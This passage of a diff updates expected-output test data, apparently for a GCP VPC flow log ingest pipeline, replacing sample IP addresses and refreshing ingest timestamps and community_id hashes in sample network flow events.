"event", "start": "2019-06-14T03:40:05.566551903Z", "end": "2019-06-14T03:49:59.565117754Z", @@ -2944,9 +2944,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65263, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -2960,7 +2960,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:z1VfQro/CzS/3/Jcw7ACjDX47kM=", + "community_id": "1:NVPn1fsNGKIWh4nC6Og4qM8A3kY=", "bytes": 106409, "transport": "tcp", "type": "ipv4", @@ -2975,7 +2975,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { 
@@ -2999,8 +2999,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868517300Z", - "original": "{\"insertId\":\"1ulp77rfdvho49\",\"jsonPayload\":{\"bytes_sent\":\"106409\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65263,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220748025Z\",\"packets_sent\":\"607\",\"reporter\":\"SRC\",\"rtt_msec\":\"87\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.270990648Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391318800Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho49\",\"jsonPayload\":{\"bytes_sent\":\"106409\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65263,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220748025Z\",\"packets_sent\":\"607\",\"reporter\":\"SRC\",\"rtt_msec\":\"87\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.270990648Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.270990648Z", "end": "2019-06-14T03:49:56.220748025Z", @@ -3027,18 +3027,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33534, "bytes": 61242, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 356 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:pYIEYHtraTMNgdi3XDEMGSH5LV4=", + "community_id": "1:kmu70zI5WDvD+rP/FihJUhIgim4=", "bytes": 61242, "name": "default", "transport": "tcp", @@ -3060,7 +3060,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -3097,8 +3097,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868520600Z", - "original": "{\"insertId\":\"1ulp77rfdvho4t\",\"jsonPayload\":{\"bytes_sent\":\"61242\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33534},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597088427Z\",\"packets_sent\":\"356\",\"reporter\":\"DEST\",\"rtt_msec\":\"311\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075942176Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391322600Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho4t\",\"jsonPayload\":{\"bytes_sent\":\"61242\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33534},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597088427Z\",\"packets_sent\":\"356\",\"reporter\":\"DEST\",\"rtt_msec\":\"311\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075942176Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075942176Z", "end": "2019-06-14T03:49:59.597088427Z", @@ -3119,10 +3119,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.101", + "address": "67.43.156.13", "port": 49680, "domain": "siem-windows", - "ip": "203.0.113.101" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -3136,7 +3136,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:o9OoB7tVAGCzWrss+96PmO6N0FI=", + "community_id": "1:cHKWt/bhFFzMhXHYkr/P9HZG8V0=", "bytes": 248826, "name": "windows-isolated", "transport": "tcp", @@ -3159,7 +3159,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.101" + "67.43.156.13" ] }, "gcp": { 
@@ -3195,8 +3195,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868524100Z", - "original": "{\"insertId\":\"1ulp77rfdvho68\",\"jsonPayload\":{\"bytes_sent\":\"248826\",\"connection\":{\"dest_ip\":\"203.0.113.101\",\"dest_port\":49680,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"siem-windows\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"},\"end_time\":\"2019-06-14T03:49:55.705469925Z\",\"packets_sent\":\"735\",\"reporter\":\"SRC\",\"rtt_msec\":\"113\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.711043814Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391326400Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho68\",\"jsonPayload\":{\"bytes_sent\":\"248826\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":49680,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"siem-windows\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"},\"end_time\":\"2019-06-14T03:49:55.705469925Z\",\"packets_sent\":\"735\",\"reporter\":\"SRC\",\"rtt_msec\":\"113\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.711043814Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.711043814Z", "end": "2019-06-14T03:49:55.705469925Z", @@ -3217,9 +3217,9 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 33862, - "ip": "192.0.2.117" + "ip": "192.168.2.117" }, "source": { "address": "10.87.40.76", @@ -3233,7 +3233,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:PNZTJG/Xqm+YMqKIui8nRXoLovE=", + "community_id": "1:HWHsV+dz7l0NO6OLlewyD4wOVhc=", "bytes": 1777, "transport": "tcp", "type": "ipv4", @@ -3248,7 +3248,7 @@ "related": { "ip": [ "10.87.40.76", - "192.0.2.117" + "192.168.2.117" ] }, "gcp": { 
@@ -3272,8 +3272,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868527300Z", - "original": "{\"insertId\":\"1ulp77rfdvho5n\",\"jsonPayload\":{\"bytes_sent\":\"1777\",\"connection\":{\"dest_ip\":\"192.0.2.117\",\"dest_port\":33862,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:11.779780615Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:11.655143526Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391329800Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho5n\",\"jsonPayload\":{\"bytes_sent\":\"1777\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":33862,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:11.779780615Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:11.655143526Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:46:11.655143526Z", "end": "2019-06-14T03:46:11.779780615Z", @@ -3296,9 +3296,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65321, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -3312,7 +3312,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:bN6NKWS7CM7qV5T0FRSxEVoL53I=", + "community_id": "1:CLTnKCsx3XAJV3yhtJSs+Vn6Xsc=", "bytes": 116845, "transport": "tcp", "type": "ipv4", @@ -3327,7 +3327,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { 
@@ -3351,8 +3351,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868530600Z", - "original": "{\"insertId\":\"1ulp77rfdvho5l\",\"jsonPayload\":{\"bytes_sent\":\"116845\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65321,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"594\",\"reporter\":\"SRC\",\"rtt_msec\":\"219\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.843986502Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391334100Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho5l\",\"jsonPayload\":{\"bytes_sent\":\"116845\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65321,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"594\",\"reporter\":\"SRC\",\"rtt_msec\":\"219\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.843986502Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.843986502Z", "end": "2019-06-14T03:49:56.312105537Z", @@ -3379,18 +3379,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33524, "bytes": 4614, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 58 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:jUDducT3iKEBK6mG6FO1bbR/lzQ=", + "community_id": "1:6nRZDTz3kwMjD/sK6/2SvfZM7Ks=", "bytes": 4614, "name": "default", "transport": "tcp", @@ -3412,7 +3412,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -3449,8 +3449,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868533900Z", - "original": "{\"insertId\":\"1ulp77rfdvho65\",\"jsonPayload\":{\"bytes_sent\":\"4614\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33524},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461087350Z\",\"packets_sent\":\"58\",\"reporter\":\"DEST\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.790136141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391338900Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho65\",\"jsonPayload\":{\"bytes_sent\":\"4614\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33524},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461087350Z\",\"packets_sent\":\"58\",\"reporter\":\"DEST\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.790136141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:24.790136141Z", "end": "2019-06-14T03:49:56.461087350Z", @@ -3471,10 +3471,10 @@ "as": { "number": 15169 }, - "address": "192.0.2.177", + "address": "192.168.2.177", "port": 60112, "domain": "suricata-iowa", - "ip": "192.0.2.177" + "ip": "192.168.2.177" }, "source": { "address": "10.139.99.242", @@ -3488,7 +3488,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:h6NgISKzvTiBXyH4aX48ebaiTiY=", + "community_id": "1:tEFDnW0zs/Y86QZ+V6iUmdJfre4=", "bytes": 50379, "name": "default", "transport": "tcp", @@ -3511,7 +3511,7 @@ "related": { "ip": [ "10.139.99.242", - "192.0.2.177" + "192.168.2.177" ] }, "gcp": { 
@@ -3547,8 +3547,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868537300Z", - "original": "{\"insertId\":\"1ulp77rfdvho4b\",\"jsonPayload\":{\"bytes_sent\":\"50379\",\"connection\":{\"dest_ip\":\"192.0.2.177\",\"dest_port\":60112,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:18.224268993Z\",\"packets_sent\":\"130\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:14.031541248Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391344Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho4b\",\"jsonPayload\":{\"bytes_sent\":\"50379\",\"connection\":{\"dest_ip\":\"192.168.2.177\",\"dest_port\":60112,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:18.224268993Z\",\"packets_sent\":\"130\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:14.031541248Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:14.031541248Z", "end": "2019-06-14T03:49:18.224268993Z", @@ -3575,18 +3575,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 200417, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 250 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:U8onVg/hApWe9WsWGFifAt6Xktg=", + "community_id": "1:VmSf9DDKsJGi5cMJABVFKp5r22M=", "bytes": 200417, "name": "default", "transport": "tcp", @@ -3608,7 +3608,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -3645,8 +3645,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868540500Z", - "original": "{\"insertId\":\"1ulp77rfdvho4m\",\"jsonPayload\":{\"bytes_sent\":\"200417\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33552,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213244028Z\",\"packets_sent\":\"250\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075811571Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391348500Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho4m\",\"jsonPayload\":{\"bytes_sent\":\"200417\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33552,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213244028Z\",\"packets_sent\":\"250\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075811571Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075811571Z", "end": "2019-06-14T03:49:55.213244028Z", @@ -3667,10 +3667,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33524, "domain": "kibana", - "ip": "203.0.113.134" + 